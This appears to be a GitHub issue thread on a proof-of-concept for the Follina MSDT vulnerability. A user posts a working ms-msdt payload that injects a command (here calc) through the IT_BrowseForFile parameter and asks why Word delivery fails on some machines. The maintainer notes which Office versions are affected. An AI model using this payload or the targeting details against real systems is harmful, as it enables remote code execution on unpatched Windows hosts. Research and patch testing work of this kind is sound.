### ISSUE TITLE
word+exp not work? I need help

### ISSUE THREAD

**Issue by r90tpass** [chvancooten/follina.py#9]
I'm going to run this directly in Win+R

ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=/../../$(calc)/.exe"

I can open calc,But using Word with exp shows that exp is loaded but MSDT is not executed

**Comment by r90tpass** [comment]
oh .some PC is ok (word+exp)
but some pc not word.msdt not load

**Comment by chvancooten** [comment]
This vulnerability is known to work only on Office 2016/2019 and Office 365 on the Semi-Annual channel. There are some reports of the .rtf extension working for later versions, but I haven't confirmed this.
